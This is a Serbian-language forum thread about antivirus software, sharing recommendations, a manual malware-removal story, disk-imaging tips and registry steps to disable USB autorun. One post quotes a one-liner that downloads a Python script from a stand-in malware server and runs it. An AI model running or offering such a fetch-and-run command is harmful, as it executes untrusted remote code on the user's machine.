Jump to content

antivirusni programi


 krvimozak

Preporučeni Komentari

Ja imam samo reci hvale za Nod32. Meni lepo radi, u paru sa Spybot Search & Destroy. Fles diskovi mi setaju sa kucnog na racunar u firmi, desavalo mi se da u firmi pokupim virus (Sophos AV), a da Sophos uopste to ni ne registruje. Kada tako zarazen fles ubodem u kucnu masinu, odmah se desava Nod32 pobuna.

+1 Baš tako. Još jedna preporuka za navedenu kombinaciju. Tako je i kod mene već dugo i nikakvih problema.Ko je kriv administratoru u firmi što ne zna da namesti NOD32 sa neograničenim trajanjem licence. :coffee:

Pohvalio sam se pre nekog vremena, kad preksinoć, dok sam mirno spavao, a comp bio ukačen (ADSL, ništa nije išlo tipa download ili torrent) neke/nešto me napadne i pohara neke sistemske fajlove. NOD32 ga je odmah registrovao, izbacio 2-3 prozora sa oznakom i lokacijom na compu, ali da sam sa njim na kraj izadje -nix. Upišem ja na papir agresore sa lokacijama, izmedju ostalih je kolovodja je bio service.exe na win/system32 dir. Gasnem comp, podignem sa nezavisnim OS-om (admin pack) koji podigne sistem mimo Win-a ali ima alate za sve i svašta za prčkanje. Pa odem i ručno pobrišem razbojnike. Onda podignem opet Win, vidim slupani mi razni kerneli, isključen i nedostupan system restore. Pošto sam poubijao glavne face, učitam nekako NOD32, Spybot, Malwarebytes i pustim ih da sve izvrte na najtemeljnijem nivou. NOD32 poubija još nekoliko fajlova koje su glavne (i ručno pobijene) face ostavile unaokolo, a Spybot i Malwarebytes pronadju svaki po nekoliko trojanaca i malware-a i blokiranih procesa. Kada sam to počistio, ostalo je da uradim deinstall, pa opet install i update za NOD32 (njegov kernel za podizanje sa Win-om je naravno ostao slupan), i pronalaženje Googlanjem gde se i kako u Administrative Tools iz Control panela može odblokirati system restore. I to sam pronašao i swičnuo ON. Dok sam to odradjivao, downloadovao sam SP3 za moj XP, ali s obzirom da je ručni rad dao dobre rezultate, nije bilo potrebe da "gazim" sve sa SP3. Imam i ghost_od_C koji je na drugoj particiji, ali to je predvidjeno kao krajnja mera, a nije bio baš ni najsvežiji, pa bi bilo posla i pre i nakon otpakivanja.
Link to comment
Podeli na ovim sajtovima

  • Odgovora 32
  • Kreirano pre
  • Zadnji odgovor pre

Aktivni članovi u ovoj temi

Aktivni članovi u ovoj temi

Postovane slike

http://stason.org/TULARC/os/linux.virus.html

Mene ne brine jer ne igram onlajn igrice, ne igram igrice uopšte, ako ćemo tako... :coffee:

A ako baš neko hoće...

http://www.geekzone.co.nz/foobar/6229

% bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"
Link to comment
Podeli na ovim sajtovima

Ljudi koji intenzivno koriste kompjuter mogu da se podele u dve grupe, kada su igre u pitanju:

1. oni koji priznaju da se igraju

2. oni ne priznaju da se igraju

:coffee:

Onda ja ne koristim računar intenzivno :)
Link to comment
Podeli na ovim sajtovima

...trči u virtualnom modu sa optičkog diska...

To.Inace, moja zenetina ne loce a ni ja... Zalihe maligana u kuci su uvek na istom nivou, flasu rakije stare 20 godina sam nasledio od oca i jos uvek ima za nekoliko casica, jedina ralika je to sto je sada rakija stara 30 godina.Jbg, gosti vise vole skivi...Btw, Boki, kako se pravi ghost tj. mirror od C?
Link to comment
Podeli na ovim sajtovima

Btw, Boki, kako se pravi ghost tj. mirror od C?

Treba imati neki program koji se bavi time, npr. Norton Ghost, koji se nareže na disk tako da je disk bootabilan. On podiže osnovno od DOS fajlova, odatle se pokrene sam Norton Ghost(exe), a dalje bi trebalo da je jasno kako ide preko pull-down menija. Izabere se Partition-to-ghost, izabere se odgovarajuća particija, pa se imenuje fajl, izabere lokacija za njega....
Link to comment
Podeli na ovim sajtovima

Ajd' i ja da dodam koju...

Dugo sam koristio AVG Free, sve do najnovije verzije (9.0) pa ga deinstalirao. Razlog: Poceo je da se mesa

u previse stvari. Jedna od njih je da nisam mogao da skidam e-mail poruke jer AVG trci ka serveru/serverima

na kojima je moja posta te oni naravno ovu akciju odbijaju. Presao na Avast Free, zadovoljan.

Uz to SpywareDoctor i Comodo firewall. Free.

Najcesci oblik prenosa virusa danas je preko dragih nam usb stikova.

Evo interesantnog pomocnika: Autorun Eater Kako se virus pokrece sa stika?

Najcesce virus upisuje svoj 'autorun.inf' fajl koji se automatski pokrece ubacivanjem stika u kompjuter.

Tako pokrece glavni program tj. viruscic. Mala kozica pase 'autorun.inf' osim kada joj kazete da je predmetni

bezazlen i potreban. Ovo moze biti npr ako imate instaliran npr. 'MojoPac' - virtuelni PC na stiku ili druge

aplikacije kojima treba 'autorun.inf'. Samom stiku 'autorun.inf' ne treba i ako ga vidite/imate - to je neki

viruscic castio. :coffee:

Link to comment
Podeli na ovim sajtovima

Djole je u pravu, promiskuitetni USB stikovi su trenutno najveci izvor zaraze na Windows PC-u.Ono sto svako moze da uradi je da iskljuci automatsko izvrsavanje autorun.inf kroz Local Policy, na sledeci nacin:START -> RUN -> GPEDIT.MSCi onda po slici:post-20-126114012697_thumb.jpgMaliciozan kod cemo uglavnom lako da odstranimo, bitno je na ovaj nacin potpuno spreciti njegovo automatsko izvrsavanje i sirenje.

Link to comment
Podeli na ovim sajtovima

Sad vidim da GPEDIT.MSC ne radi na Home verziji.U tom slucaju treba napraviti u Notepad-u fajl sledece sadrzine:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] "NoDriveTypeAutoRun"=dword:000000ffi sacuvati ga kao JokAutoPlay.reg Potom uraditi dupli klik na taj fajl kako bi se upisao u registry.-----------------------------------------------------------------------------------Najlaksa fora je da se drzi pritisnuto Shift dugme na tastaturi kad se ubacuje USB stick. To takodje sprecava automatsko izvrsenje.

Link to comment
Podeli na ovim sajtovima

Kreiraj nalog ili se prijavi da daš komentar

Potrebno je da budeš član DiyAudio.rs-a da bi ostavio komentar

Kreiraj nalog

Prijavite se za novi nalog na DiyAudio.rs zajednici. Jednostavno je!

Registruj novi nalog

Prijavi se

Već imaš nalog? Prijavi se ovde

Prijavi se odmah
  • Članovi koji sada čitaju   0 članova

    • Nema registrovanih članova koji gledaju ovu stranicu
×
×
  • Kreiraj novo...